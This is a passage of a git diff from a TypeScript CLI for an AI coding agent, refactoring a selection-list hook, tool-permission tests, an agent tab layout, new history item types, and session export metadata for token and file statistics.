'C' }, + ]; + + const selection = useSelectionList({ + items: regeneratedItems, + onSelect: mockOnSelect, + initialIndex: 0, + }); + + useEffect(() => { + if (tick === 0) { + setTick(1); + } + }, [tick]); + + return { + tick, + activeIndex: selection.activeIndex, + }; + }); + + expect(result.current.tick).toBe(1); + expect(result.current.activeIndex).toBe(0); + }); }); describe('Manual Control', () => { diff --git a/packages/cli/src/ui/hooks/useSelectionList.ts b/packages/cli/src/ui/hooks/useSelectionList.ts index c09aec802..81045a5bf 100644 --- a/packages/cli/src/ui/hooks/useSelectionList.ts +++ b/packages/cli/src/ui/hooks/useSelectionList.ts @@ -133,6 +133,27 @@ const computeInitialIndex = ( return targetIndex; }; +const areItemsStructurallyEqual = ( + a: Array>, + b: Array>, +): boolean => { + if (a === b) { + return true; + } + + if (a.length !== b.length) { + return false; + } + + for (let i = 0; i < a.length; i++) { + if (a[i]?.key !== b[i]?.key || a[i]?.disabled !== b[i]?.disabled) { + return false; + } + } + + return true; +}; + function selectionListReducer( state: SelectionListState, action: SelectionListAction, @@ -176,22 +197,30 @@ function selectionListReducer( case 'INITIALIZE': { const { initialIndex, items } = action.payload; + const initialIndexChanged = initialIndex !== state.initialIndex; const activeKey = - initialIndex === state.initialIndex && - state.activeIndex !== state.initialIndex + !initialIndexChanged && state.activeIndex !== state.initialIndex ? state.items[state.activeIndex]?.key : undefined; + const targetIndex = computeInitialIndex(initialIndex, items, activeKey); + const itemsStructurallyEqual = areItemsStructurallyEqual( + items, + state.items, + ); - if (items === state.items && initialIndex === state.initialIndex) { + if ( + !initialIndexChanged && + targetIndex === state.activeIndex && + itemsStructurallyEqual + ) { return state; } - const targetIndex = computeInitialIndex(initialIndex, items, activeKey); - return { ...state, - items, + items: itemsStructurallyEqual ? state.items : items, activeIndex: targetIndex, + initialIndex, pendingHighlight: false, }; } diff --git a/packages/cli/src/ui/hooks/useToolScheduler.test.ts b/packages/cli/src/ui/hooks/useToolScheduler.test.ts index 4e0b753d3..dc898d46c 100644 --- a/packages/cli/src/ui/hooks/useToolScheduler.test.ts +++ b/packages/cli/src/ui/hooks/useToolScheduler.test.ts @@ -59,7 +59,7 @@ const mockConfig = { }, getTruncateToolOutputThreshold: () => DEFAULT_TRUNCATE_TOOL_OUTPUT_THRESHOLD, getTruncateToolOutputLines: () => DEFAULT_TRUNCATE_TOOL_OUTPUT_LINES, - getAllowedTools: vi.fn(() => []), + getPermissionsAllow: vi.fn(() => []), getContentGeneratorConfig: () => ({ model: 'test-model', authType: 'gemini', @@ -68,30 +68,29 @@ const mockConfig = { getGeminiClient: () => null, // No client needed for these tests getShellExecutionConfig: () => ({ terminalWidth: 80, terminalHeight: 24 }), getChatRecordingService: () => undefined, + getMessageBus: vi.fn().mockReturnValue(undefined), + getEnableHooks: vi.fn().mockReturnValue(false), + getHookSystem: vi.fn().mockReturnValue(undefined), + getDebugLogger: vi.fn().mockReturnValue({ + debug: vi.fn(), + info: vi.fn(), + warn: vi.fn(), + error: vi.fn(), + }), } as unknown as Config; const mockTool = new MockTool({ name: 'mockTool', displayName: 'Mock Tool', execute: vi.fn(), - shouldConfirmExecute: vi.fn(), -}); -const mockToolWithLiveOutput = new MockTool({ - name: 'mockToolWithLiveOutput', - displayName: 'Mock Tool With Live Output', - description: 'A mock tool for testing', - params: {}, - isOutputMarkdown: true, - canUpdateOutput: true, - execute: vi.fn(), - shouldConfirmExecute: vi.fn(), }); let mockOnUserConfirmForToolConfirmation: Mock; const mockToolRequiresConfirmation = new MockTool({ name: 'mockToolRequiresConfirmation', displayName: 'Mock Tool Requires Confirmation', execute: vi.fn(), - shouldConfirmExecute: vi.fn(), + getDefaultPermission: () => Promise.resolve('ask' as any), + getConfirmationDetails: vi.fn(), }); describe('useReactToolScheduler in YOLO Mode', () => { @@ -103,7 +102,7 @@ describe('useReactToolScheduler in YOLO Mode', () => { setPendingHistoryItem = vi.fn(); mockToolRegistry.getTool.mockClear(); (mockToolRequiresConfirmation.execute as Mock).mockClear(); - (mockToolRequiresConfirmation.shouldConfirmExecute as Mock).mockClear(); + (mockToolRequiresConfirmation.getConfirmationDetails as Mock).mockClear(); // IMPORTANT: Enable YOLO mode for this test suite (mockConfig.getApprovalMode as Mock).mockReturnValue(ApprovalMode.YOLO); @@ -209,17 +208,14 @@ describe('useReactToolScheduler', () => { mockToolRegistry.getTool.mockClear(); (mockTool.execute as Mock).mockClear(); - (mockTool.shouldConfirmExecute as Mock).mockClear(); - (mockToolWithLiveOutput.execute as Mock).mockClear(); - (mockToolWithLiveOutput.shouldConfirmExecute as Mock).mockClear(); (mockToolRequiresConfirmation.execute as Mock).mockClear(); - (mockToolRequiresConfirmation.shouldConfirmExecute as Mock).mockClear(); + (mockToolRequiresConfirmation.getConfirmationDetails as Mock).mockClear(); mockOnUserConfirmForToolConfirmation = vi.fn(); ( - mockToolRequiresConfirmation.shouldConfirmExecute as Mock + mockToolRequiresConfirmation.getConfirmationDetails as Mock ).mockImplementation( - async (): Promise => + async (): Promise => ({ onConfirm: mockOnUserConfirmForToolConfirmation, fileName: 'mockToolRequiresConfirmation.ts', @@ -258,7 +254,6 @@ describe('useReactToolScheduler', () => { llmContent: 'Tool output', returnDisplay: 'Formatted tool output', } as ToolResult); - (mockTool.shouldConfirmExecute as Mock).mockResolvedValue(null); const { result } = renderScheduler(); const schedule = result.current[1]; @@ -343,10 +338,11 @@ describe('useReactToolScheduler', () => { expect(result.current[0]).toEqual([]); }); - it('should handle error during shouldConfirmExecute', async () => { + it('should handle error during getDefaultPermission', async () => { mockToolRegistry.getTool.mockReturnValue(mockTool); const confirmError = new Error('Confirmation check failed'); - (mockTool.shouldConfirmExecute as Mock).mockRejectedValue(confirmError); + const originalGetDefaultPermission = mockTool.getDefaultPermission; + mockTool.getDefaultPermission = () => Promise.reject(confirmError); const { result } = renderScheduler(); const schedule = result.current[1]; @@ -376,11 +372,11 @@ describe('useReactToolScheduler', () => { }), ]); expect(result.current[0]).toEqual([]); + mockTool.getDefaultPermission = originalGetDefaultPermission; }); it('should handle error during execute', async () => { mockToolRegistry.getTool.mockReturnValue(mockTool); - (mockTool.shouldConfirmExecute as Mock).mockResolvedValue(null); const execError = new Error('Execution failed'); (mockTool.execute as Mock).mockRejectedValue(execError); @@ -523,7 +519,6 @@ describe('mapToDisplay', () => { name: 'testTool', displayName: 'Test Tool Display', execute: vi.fn(), - shouldConfirmExecute: vi.fn(), }); const baseResponse: ToolCallResponseInfo = { @@ -758,7 +753,6 @@ describe('mapToDisplay', () => { displayName: baseTool.displayName, isOutputMarkdown: true, execute: vi.fn(), - shouldConfirmExecute: vi.fn(), }); const toolCall2: ToolCall = { request: { ...baseRequest, callId: 'call2' }, diff --git a/packages/cli/src/ui/hooks/usePermissionsModifyTrust.test.ts b/packages/cli/src/ui/hooks/useTrustModify.test.ts similarity index 91% rename from packages/cli/src/ui/hooks/usePermissionsModifyTrust.test.ts rename to packages/cli/src/ui/hooks/useTrustModify.test.ts index 519752e82..c73ed0aab 100644 --- a/packages/cli/src/ui/hooks/usePermissionsModifyTrust.test.ts +++ b/packages/cli/src/ui/hooks/useTrustModify.test.ts @@ -16,7 +16,7 @@ import { type Mock, } from 'vitest'; import { renderHook, act } from '@testing-library/react'; -import { usePermissionsModifyTrust } from './usePermissionsModifyTrust.js'; +import { useTrustModify } from './useTrustModify.js'; import { TrustLevel } from '../../config/trustedFolders.js'; import type { LoadedSettings } from '../../config/settings.js'; import type { LoadedTrustedFolders } from '../../config/trustedFolders.js'; @@ -46,7 +46,7 @@ vi.mock('../contexts/SettingsContext.js', () => ({ useSettings: mockedUseSettings, })); -describe('usePermissionsModifyTrust', () => { +describe('useTrustModify', () => { let mockOnExit: Mock; let mockAddItem: Mock; @@ -84,7 +84,7 @@ describe('usePermissionsModifyTrust', () => { }); const { result } = renderHook(() => - usePermissionsModifyTrust(mockOnExit, mockAddItem), + useTrustModify(mockOnExit, mockAddItem), ); expect(result.current.currentTrustLevel).toBe(TrustLevel.TRUST_FOLDER); @@ -101,7 +101,7 @@ describe('usePermissionsModifyTrust', () => { }); const { result } = renderHook(() => - usePermissionsModifyTrust(mockOnExit, mockAddItem), + useTrustModify(mockOnExit, mockAddItem), ); expect(result.current.isInheritedTrustFromParent).toBe(true); @@ -118,7 +118,7 @@ describe('usePermissionsModifyTrust', () => { }); const { result } = renderHook(() => - usePermissionsModifyTrust(mockOnExit, mockAddItem), + useTrustModify(mockOnExit, mockAddItem), ); expect(result.current.isInheritedTrustFromIde).toBe(true); @@ -137,7 +137,7 @@ describe('usePermissionsModifyTrust', () => { .mockReturnValueOnce({ isTrusted: true, source: 'file' }); const { result } = renderHook(() => - usePermissionsModifyTrust(mockOnExit, mockAddItem), + useTrustModify(mockOnExit, mockAddItem), ); act(() => { @@ -161,7 +161,7 @@ describe('usePermissionsModifyTrust', () => { }); const { result } = renderHook(() => - usePermissionsModifyTrust(mockOnExit, mockAddItem), + useTrustModify(mockOnExit, mockAddItem), ); act(() => { @@ -188,7 +188,7 @@ describe('usePermissionsModifyTrust', () => { .mockReturnValueOnce({ isTrusted: true, source: 'file' }); const { result } = renderHook(() => - usePermissionsModifyTrust(mockOnExit, mockAddItem), + useTrustModify(mockOnExit, mockAddItem), ); act(() => { @@ -218,7 +218,7 @@ describe('usePermissionsModifyTrust', () => { }); const { result } = renderHook(() => - usePermissionsModifyTrust(mockOnExit, mockAddItem), + useTrustModify(mockOnExit, mockAddItem), ); act(() => { @@ -245,7 +245,7 @@ describe('usePermissionsModifyTrust', () => { }); const { result } = renderHook(() => - usePermissionsModifyTrust(mockOnExit, mockAddItem), + useTrustModify(mockOnExit, mockAddItem), ); act(() => { diff --git a/packages/cli/src/ui/hooks/usePermissionsModifyTrust.ts b/packages/cli/src/ui/hooks/useTrustModify.ts similarity index 98% rename from packages/cli/src/ui/hooks/usePermissionsModifyTrust.ts rename to packages/cli/src/ui/hooks/useTrustModify.ts index f5a10ff38..fa403f61a 100644 --- a/packages/cli/src/ui/hooks/usePermissionsModifyTrust.ts +++ b/packages/cli/src/ui/hooks/useTrustModify.ts @@ -42,7 +42,7 @@ function getInitialTrustState( }; } -export const usePermissionsModifyTrust = ( +export const useTrustModify = ( onExit: () => void, addItem: UseHistoryManagerReturn['addItem'], ) => { diff --git a/packages/cli/src/ui/layouts/DefaultAppLayout.tsx b/packages/cli/src/ui/layouts/DefaultAppLayout.tsx index 1dd81ecb2..afa656ba7 100644 --- a/packages/cli/src/ui/layouts/DefaultAppLayout.tsx +++ b/packages/cli/src/ui/layouts/DefaultAppLayout.tsx @@ -5,43 +5,83 @@ */ import type React from 'react'; +import { useEffect, useRef } from 'react'; import { Box } from 'ink'; import { MainContent } from '../components/MainContent.js'; import { DialogManager } from '../components/DialogManager.js'; import { Composer } from '../components/Composer.js'; import { ExitWarning } from '../components/ExitWarning.js'; import { BtwMessage } from '../components/messages/BtwMessage.js'; +import { AgentTabBar } from '../components/agent-view/AgentTabBar.js'; +import { AgentChatView } from '../components/agent-view/AgentChatView.js'; +import { AgentComposer } from '../components/agent-view/AgentComposer.js'; import { useUIState } from '../contexts/UIStateContext.js'; +import { useUIActions } from '../contexts/UIActionsContext.js'; +import { useAgentViewState } from '../contexts/AgentViewContext.js'; import { useTerminalSize } from '../hooks/useTerminalSize.js'; export const DefaultAppLayout: React.FC = () => { const uiState = useUIState(); + const { refreshStatic } = useUIActions(); + const { activeView, agents } = useAgentViewState(); const { columns: terminalWidth } = useTerminalSize(); + const hasAgents = agents.size > 0; + const isAgentTab = activeView !== 'main' && agents.has(activeView); + + // Clear terminal on view switch so previous view's output + // is removed. refreshStatic clears the terminal and bumps the + // historyRemountKey so MainContent's re-renders all items + // when switching back. + const prevViewRef = useRef(activeView); + useEffect(() => { + if (prevViewRef.current !== activeView) { + prevViewRef.current = activeView; + refreshStatic(); + } + }, [activeView, refreshStatic]); return ( - - - {uiState.btwItem && ( - - - + {isAgentTab ? ( + <> + {/* Agent view: chat history + agent-specific composer */} + + + + + + + ) : ( + <> + {/* Main view: conversation history + main composer / dialogs */} + + {uiState.btwItem && ( + + + + )} + + {uiState.dialogsVisible ? ( + + + + ) : ( + + )} + + + )} - - {uiState.dialogsVisible ? ( - - - - ) : ( - - )} - - - + {/* Tab bar: visible whenever in-process agents exist and input is active */} + {hasAgents && !uiState.dialogsVisible && } ); }; diff --git a/packages/cli/src/ui/types.ts b/packages/cli/src/ui/types.ts index 1df5563c9..7f9b4c176 100644 --- a/packages/cli/src/ui/types.ts +++ b/packages/cli/src/ui/types.ts @@ -11,6 +11,7 @@ import type { ToolCallConfirmationDetails, ToolConfirmationOutcome, ToolResultDisplay, + AgentStatus, } from '@qwen-code/qwen-code-core'; import type { PartListUnion } from '@google/genai'; import { type ReactNode } from 'react'; @@ -68,7 +69,6 @@ export interface IndividualToolCallDisplay { confirmationDetails: ToolCallConfirmationDetails | undefined; renderOutputAsMarkdown?: boolean; ptyId?: number; - outputFile?: string; } export interface CompressionProps { @@ -129,6 +129,11 @@ export type HistoryItemWarning = HistoryItemBase & { text: string; }; +export type HistoryItemSuccess = HistoryItemBase & { + type: 'success'; + text: string; +}; + export type HistoryItemRetryCountdown = HistoryItemBase & { type: 'retry_countdown'; text: string; @@ -257,6 +262,89 @@ export type HistoryItemMcpStatus = HistoryItemBase & { showTips: boolean; }; +// --- Context Usage types --- + +export interface ContextCategoryBreakdown { + systemPrompt: number; + builtinTools: number; + mcpTools: number; + memoryFiles: number; + skills: number; + messages: number; + freeSpace: number; + autocompactBuffer: number; +} + +export interface ContextToolDetail { + name: string; + tokens: number; +} + +export interface ContextMemoryDetail { + path: string; + tokens: number; +} + +export interface ContextSkillDetail { + name: string; + /** Token cost of the skill listing (name+description) in the tool definition */ + tokens: number; + /** Whether this skill has been invoked and its full body loaded into context */ + loaded?: boolean; + /** Token cost of the loaded SKILL.md body (only set when loaded is true) */ + bodyTokens?: number; +} + +export type HistoryItemContextUsage = HistoryItemBase & { + type: 'context_usage'; + modelName: string; + totalTokens: number; + contextWindowSize: number; + breakdown: ContextCategoryBreakdown; + builtinTools: ContextToolDetail[]; + mcpTools: ContextToolDetail[]; + memoryFiles: ContextMemoryDetail[]; + skills: ContextSkillDetail[]; + /** True when totalTokens is estimated (no API call yet) rather than from API response */ + isEstimated?: boolean; + /** When true, show per-item detail sections (tools, memory, skills). Default: false (compact). */ + showDetails?: boolean; +}; + +/** + * Arena agent completion card data. + */ +export interface ArenaAgentCardData { + label: string; + status: AgentStatus; + durationMs: number; + totalTokens: number; + inputTokens: number; + outputTokens: number; + toolCalls: number; + successfulToolCalls: number; + failedToolCalls: number; + rounds: number; + error?: string; + diff?: string; +} + +export type HistoryItemArenaAgentComplete = HistoryItemBase & { + type: 'arena_agent_complete'; + agent: ArenaAgentCardData; +}; + +export type HistoryItemArenaSessionComplete = HistoryItemBase & { + type: 'arena_session_complete'; + sessionStatus: string; + task: string; + totalDurationMs: number; + agents: ArenaAgentCardData[]; +}; + +/** + * Insight progress message. + */ export type HistoryItemInsightProgress = HistoryItemBase & { type: 'insight_progress'; progress: InsightProgressProps; @@ -287,6 +375,7 @@ export type HistoryItemWithoutId = | HistoryItemInfo | HistoryItemError | HistoryItemWarning + | HistoryItemSuccess | HistoryItemRetryCountdown | HistoryItemAbout | HistoryItemHelp @@ -302,6 +391,9 @@ export type HistoryItemWithoutId = | HistoryItemToolsList | HistoryItemSkillsList | HistoryItemMcpStatus + | HistoryItemContextUsage + | HistoryItemArenaAgentComplete + | HistoryItemArenaSessionComplete | HistoryItemInsightProgress | HistoryItemBtw; @@ -310,6 +402,7 @@ export type HistoryItem = HistoryItemWithoutId & { id: number }; // Message types used by internal command feedback (subset of HistoryItem types) export enum MessageType { INFO = 'info', + SUCCESS = 'success', ERROR = 'error', WARNING = 'warning', USER = 'user', @@ -326,6 +419,9 @@ export enum MessageType { TOOLS_LIST = 'tools_list', SKILLS_LIST = 'skills_list', MCP_STATUS = 'mcp_status', + CONTEXT_USAGE = 'context_usage', + ARENA_AGENT_COMPLETE = 'arena_agent_complete', + ARENA_SESSION_COMPLETE = 'arena_session_complete', INSIGHT_PROGRESS = 'insight_progress', BTW = 'btw', } diff --git a/packages/cli/src/ui/utils/InlineMarkdownRenderer.tsx b/packages/cli/src/ui/utils/InlineMarkdownRenderer.tsx index ce31078d1..2403db96f 100644 --- a/packages/cli/src/ui/utils/InlineMarkdownRenderer.tsx +++ b/packages/cli/src/ui/utils/InlineMarkdownRenderer.tsx @@ -103,7 +103,7 @@ const RenderInlineInternal: React.FC = ({ const codeMatch = fullMatch.match(/^(`+)(.+?)\1$/s); if (codeMatch && codeMatch[2]) { renderedNode = ( - + {codeMatch[2]} ); diff --git a/packages/cli/src/ui/utils/displayUtils.ts b/packages/cli/src/ui/utils/displayUtils.ts index b8f603170..4f8fabb16 100644 --- a/packages/cli/src/ui/utils/displayUtils.ts +++ b/packages/cli/src/ui/utils/displayUtils.ts @@ -5,6 +5,34 @@ */ import { theme } from '../semantic-colors.js'; +import { AgentStatus } from '@qwen-code/qwen-code-core'; + +// --- Status Labels --- + +export interface StatusLabel { + icon: string; + text: string; + color: string; +} + +export function getArenaStatusLabel(status: AgentStatus): StatusLabel { + switch (status) { + case AgentStatus.IDLE: + return { icon: '✓', text: 'Idle', color: theme.status.success }; + case AgentStatus.COMPLETED: + return { icon: '✓', text: 'Done', color: theme.status.success }; + case AgentStatus.CANCELLED: + return { icon: '⊘', text: 'Cancelled', color: theme.status.warning }; + case AgentStatus.FAILED: + return { icon: '✗', text: 'Failed', color: theme.status.error }; + case AgentStatus.RUNNING: + return { icon: '○', text: 'Running', color: theme.text.secondary }; + case AgentStatus.INITIALIZING: + return { icon: '○', text: 'Initializing', color: theme.text.secondary }; + default: + return { icon: '○', text: status, color: theme.text.secondary }; + } +} // --- Thresholds --- export const TOOL_SUCCESS_RATE_HIGH = 95; diff --git a/packages/cli/src/ui/utils/export/collect.ts b/packages/cli/src/ui/utils/export/collect.ts index 112f38c7f..cd203da95 100644 --- a/packages/cli/src/ui/utils/export/collect.ts +++ b/packages/cli/src/ui/utils/export/collect.ts @@ -6,10 +6,395 @@ import { randomUUID } from 'node:crypto'; import type { Config, ChatRecord } from '@qwen-code/qwen-code-core'; +import type { GenerateContentResponseUsageMetadata } from '@google/genai'; import type { SessionContext } from '../../../acp-integration/session/types.js'; import type { SessionUpdate, ToolCall } from '@agentclientprotocol/sdk'; import { HistoryReplayer } from '../../../acp-integration/session/HistoryReplayer.js'; -import type { ExportMessage, ExportSessionData } from './types.js'; +import type { + ExportMessage, + ExportSessionData, + ExportMetadata, +} from './types.js'; + +/** + * File operation statistics extracted from tool calls. + */ +interface FileOperationStats { + filesWritten: number; + linesAdded: number; + linesRemoved: number; + writtenFilePaths: Set; +} + +/** + * Tool call arguments index for matching tool_result records. + */ +interface ToolCallArgsIndex { + byId: Map>; + byName: Map>>; +} + +/** + * Extracts tool name from a ChatRecord's function response. + */ +function extractToolNameFromRecord(record: ChatRecord): string | undefined { + if (!record.message?.parts) { + return undefined; + } + + for (const part of record.message.parts) { + if ('functionResponse' in part && part.functionResponse?.name) { + return part.functionResponse.name; + } + } + + return undefined; +} + +/** + * Extracts call ID from a ChatRecord's function response. + */ +function extractFunctionResponseId(record: ChatRecord): string | undefined { + if (!record.message?.parts) { + return undefined; + } + + for (const part of record.message.parts) { + if ('functionResponse' in part && part.functionResponse?.id) { + return part.functionResponse.id; + } + } + + return undefined; +} + +/** + * Normalizes function call args into a plain object. + */ +function normalizeFunctionCallArgs( + args: unknown, +): Record | undefined { + if (args && typeof args === 'object') { + return args as Record; + } + if (typeof args === 'string') { + try { + const parsed = JSON.parse(args) as unknown; + if (parsed && typeof parsed === 'object') { + return parsed as Record; + } + } catch { + // Ignore parse errors and treat as unavailable args + } + } + return undefined; +} + +/** + * Builds an index of assistant tool calls for later tool_result arg resolution. + */ +function buildToolCallArgsIndex(records: ChatRecord[]): ToolCallArgsIndex { + const byId = new Map>(); + const byName = new Map>>(); + + for (const record of records) { + if (record.type !== 'assistant' || !record.message?.parts) continue; + + for (const part of record.message.parts) { + if (!('functionCall' in part) || !part.functionCall?.name) continue; + + const normalizedArgs = normalizeFunctionCallArgs(part.functionCall.args); + if (!normalizedArgs) continue; + + const toolName = part.functionCall.name; + const callId = + typeof part.functionCall.id === 'string' ? part.functionCall.id : null; + + if (callId) { + byId.set(callId, normalizedArgs); + } + + const queue = byName.get(toolName) ?? []; + queue.push(normalizedArgs); + byName.set(toolName, queue); + } + } + + return { byId, byName }; +} + +/** + * Calculate file operation statistics from ChatRecords. + * Uses toolCallResult from tool_result records for accurate statistics. + */ +function calculateFileStats(records: ChatRecord[]): FileOperationStats { + const argsIndex = buildToolCallArgsIndex(records); + const byNameCursor = new Map(); + + const stats: FileOperationStats = { + filesWritten: 0, + linesAdded: 0, + linesRemoved: 0, + writtenFilePaths: new Set(), + }; + + for (const record of records) { + if (record.type !== 'tool_result' || !record.toolCallResult) continue; + + const toolName = extractToolNameFromRecord(record); + const callId = + record.toolCallResult.callId ?? extractFunctionResponseId(record); + const argsFromId = + callId && argsIndex.byId.has(callId) + ? argsIndex.byId.get(callId) + : undefined; + let args = argsFromId; + if (!args && toolName) { + const queue = argsIndex.byName.get(toolName); + if (queue && queue.length > 0) { + const cursor = byNameCursor.get(toolName) ?? 0; + args = queue[cursor]; + byNameCursor.set(toolName, cursor + 1); + } + } + const { resultDisplay } = record.toolCallResult; + + // Track file locations from resultDisplay + if ( + resultDisplay && + typeof resultDisplay === 'object' && + 'fileName' in resultDisplay + ) { + const display = resultDisplay as { + fileName: string; + fileDiff?: string; + originalContent?: string | null; + newContent?: string; + diffStat?: { model_added_lines?: number; model_removed_lines?: number }; + }; + + // Determine operation type based on content fields + const hasOriginalContent = 'originalContent' in display; + const hasNewContent = 'newContent' in display; + + // For write/edit operations, use full path from args if available + let filePath: string; + if (typeof display.fileName === 'string') { + // Prefer args.file_path for full path, fallback to fileName (which may be basename) + filePath = + (args?.['file_path'] as string) || + (args?.['absolute_path'] as string) || + display.fileName; + } else { + // Fallback if fileName is not a string + filePath = 'unknown'; + } + + if (hasOriginalContent || hasNewContent) { + // This is a write/edit operation + stats.filesWritten++; + stats.writtenFilePaths.add(filePath); + + // Calculate line changes + if (display.diffStat) { + // Use diffStat if available for accurate counts + stats.linesAdded += display.diffStat.model_added_lines ?? 0; + stats.linesRemoved += display.diffStat.model_removed_lines ?? 0; + } else { + // Fallback: count lines in content + const oldText = String(display.originalContent ?? ''); + const newText = String(display.newContent ?? ''); + + // Count non-empty lines + const oldLines = oldText + .split('\n') + .filter((line) => line.length > 0).length; + const newLines = newText + .split('\n') + .filter((line) => line.length > 0).length; + + stats.linesAdded += newLines; + stats.linesRemoved += oldLines; + } + } + } + } + + return stats; +} + +/** + * Extracts token usage from TaskResultDisplay executionSummary. + */ +function extractTaskToolTokens(record: ChatRecord): number { + if (record.type !== 'tool_result' || !record.toolCallResult?.resultDisplay) { + return 0; + } + + const { resultDisplay } = record.toolCallResult; + if ( + typeof resultDisplay === 'object' && + 'type' in resultDisplay && + resultDisplay.type === 'task_execution' && + 'executionSummary' in resultDisplay + ) { + const summary = resultDisplay.executionSummary as { + totalTokens?: number; + inputTokens?: number; + outputTokens?: number; + thoughtTokens?: number; + cachedTokens?: number; + }; + // Use totalTokens if available, otherwise sum individual token counts + if (typeof summary.totalTokens === 'number') { + return summary.totalTokens; + } + // Fallback: sum available token counts + return ( + (summary.inputTokens ?? 0) + + (summary.outputTokens ?? 0) + + (summary.thoughtTokens ?? 0) + + (summary.cachedTokens ?? 0) + ); + } + + return 0; +} + +/** + * Calculate token statistics from ChatRecords. + * Aggregates usageMetadata from assistant records and TaskTool executionSummary to get total token usage. + * Uses the last assistant record that has both totalTokenCount and contextWindowSize for calculating context usage percent. + */ +function calculateTokenStats(records: ChatRecord[]): { + totalTokens: number; + contextUsagePercent?: number; + contextWindowSize?: number; +} { + let totalTokens = 0; + // Track the last assistant record that has BOTH totalTokenCount and contextWindowSize + // to ensure the percentage calculation uses values from the same record + let lastValidRecord: { + totalTokenCount: number; + contextWindowSize: number; + } | null = null; + + // Aggregate usageMetadata from all assistant records + for (const record of records) { + if (record.type === 'assistant') { + if (record.usageMetadata) { + totalTokens += record.usageMetadata.totalTokenCount ?? 0; + } + // Only update lastValidRecord when BOTH values are present in the same record + if ( + record.usageMetadata?.totalTokenCount !== undefined && + record.contextWindowSize !== undefined + ) { + lastValidRecord = { + totalTokenCount: record.usageMetadata.totalTokenCount, + contextWindowSize: record.contextWindowSize, + }; + } + } + + // Include TaskTool token usage from executionSummary + const taskTokens = extractTaskToolTokens(record); + if (taskTokens > 0) { + totalTokens += taskTokens; + } + } + + // Use last valid record's values for context usage calculation + // This represents how much of the context window is being used by the total tokens + if (lastValidRecord) { + const percent = + (lastValidRecord.totalTokenCount / lastValidRecord.contextWindowSize) * + 100; + return { + totalTokens, + contextUsagePercent: Math.round(percent * 10) / 10, + contextWindowSize: lastValidRecord.contextWindowSize, + }; + } + + // Fallback: return the contextWindowSize from the last assistant record even if no valid pair found + // (for display purposes only, without percentage) + const lastAssistantRecord = [...records] + .reverse() + .find((r) => r.type === 'assistant' && r.contextWindowSize !== undefined); + + return { + totalTokens, + contextWindowSize: lastAssistantRecord?.contextWindowSize, + }; +} + +/** + * Extract session metadata from ChatRecords. + */ +async function extractMetadata( + conversation: { + sessionId: string; + startTime: string; + messages: ChatRecord[]; + }, + config: Config, +): Promise { + const { sessionId, startTime, messages } = conversation; + + // Extract basic info from the first record + const firstRecord = messages[0]; + const cwd = firstRecord?.cwd ?? ''; + const gitBranch = firstRecord?.gitBranch; + + // Get git repository name + let gitRepo: string | undefined; + if (cwd) { + const { getGitRepoName } = await import('@qwen-code/qwen-code-core'); + gitRepo = getGitRepoName(cwd); + } + + // Try to get model from assistant messages + let model: string | undefined; + for (const record of messages) { + if (record.type === 'assistant' && record.model) { + model = record.model; + break; + } + } + + // Get channel from config + const channel = config.getChannel?.(); + + // Count user prompts + const promptCount = messages.filter((m) => m.type === 'user').length; + + // Calculate file stats from original ChatRecords + const fileStats = calculateFileStats(messages); + + // Calculate token stats from original ChatRecords + // contextWindowSize is retrieved from the last assistant record for accuracy + const tokenStats = calculateTokenStats(messages); + + return { + sessionId, + startTime, + exportTime: new Date().toISOString(), + cwd, + gitRepo, + gitBranch, + model, + channel, + promptCount, + contextUsagePercent: tokenStats.contextUsagePercent, + contextWindowSize: tokenStats.contextWindowSize, + totalTokens: tokenStats.totalTokens, + filesWritten: fileStats.writtenFilePaths.size, + linesAdded: fileStats.linesAdded, + linesRemoved: fileStats.linesRemoved, + uniqueFiles: Array.from(fileStats.writtenFilePaths), + }; +} /** * Export session context that captures session updates into export messages. @@ -24,6 +409,7 @@ class ExportSessionContext implements SessionContext { role: 'user' | 'assistant' | 'thinking'; parts: Array<{ text: string }>; timestamp: number; + usageMetadata?: GenerateContentResponseUsageMetadata; } | null = null; private activeRecordId: string | null = null; private activeRecordTimestamp: string | null = null; @@ -39,9 +425,37 @@ class ExportSessionContext implements SessionContext { case 'user_message_chunk': this.handleMessageChunk('user', update.content); break; - case 'agent_message_chunk': - this.handleMessageChunk('assistant', update.content); + case 'agent_message_chunk': { + // Extract usageMetadata from _meta if available + const usageMeta = update._meta as + | { + usage?: { + inputTokens?: number; + outputTokens?: number; + totalTokens?: number; + thoughtTokens?: number; + cachedReadTokens?: number; + }; + } + | undefined; + const usageMetadata: GenerateContentResponseUsageMetadata | undefined = + usageMeta?.usage + ? { + promptTokenCount: usageMeta.usage.inputTokens, + candidatesTokenCount: usageMeta.usage.outputTokens, + totalTokenCount: usageMeta.usage.totalTokens, + thoughtsTokenCount: usageMeta.usage.thoughtTokens, + cachedContentTokenCount: usageMeta.usage.cachedReadTokens, + } + : undefined; + this.handleMessageChunk( + 'assistant', + update.content, + 'assistant', + usageMetadata, + ); break; + } case 'agent_thought_chunk': this.handleMessageChunk('assistant', update.content, 'thinking'); break; @@ -79,6 +493,7 @@ class ExportSessionContext implements SessionContext { role: 'user' | 'assistant', content: { type: string; text?: string }, messageRole: 'user' | 'assistant' | 'thinking' = role, + usageMetadata?: GenerateContentResponseUsageMetadata, ): void { if (content.type !== 'text' || !content.text) return; @@ -98,12 +513,17 @@ class ExportSessionContext implements SessionContext { this.currentMessage.role === messageRole ) { this.currentMessage.parts.push({ text: content.text }); + // Merge usageMetadata if provided (for assistant messages) + if (usageMetadata && role === 'assistant') { + this.currentMessage.usageMetadata = usageMetadata; + } } else { this.currentMessage = { type: role, role: messageRole, parts: [{ text: content.text }], timestamp: Date.now(), + ...(usageMetadata && role === 'assistant' ? { usageMetadata } : {}), }; } } @@ -205,7 +625,7 @@ class ExportSessionContext implements SessionContext { if (!this.currentMessage) return; const uuid = this.getMessageUuid(); - this.messages.push({ + const exportMessage: ExportMessage = { uuid, sessionId: this.sessionId, timestamp: this.getMessageTimestamp(), @@ -214,7 +634,17 @@ class ExportSessionContext implements SessionContext { role: this.currentMessage.role, parts: this.currentMessage.parts, }, - }); + }; + + // Add usageMetadata for assistant messages + if ( + this.currentMessage.type === 'assistant' && + this.currentMessage.usageMetadata + ) { + exportMessage.usageMetadata = this.currentMessage.usageMetadata; + } + + this.messages.push(exportMessage); this.currentMessage = null; } @@ -258,9 +688,13 @@ export async function collectSessionData( // Get the export messages const messages = exportContext.getMessages(); + // Extract metadata from conversation + const metadata = await extractMetadata(conversation, config); + return { sessionId: conversation.sessionId, startTime: conversation.startTime, messages, + metadata, }; } diff --git a/packages/cli/src/ui/utils/export/formatters/html.ts b/packages/cli/src/ui/utils/export/formatters/html.ts index b4b72fb39..3fb4b9914 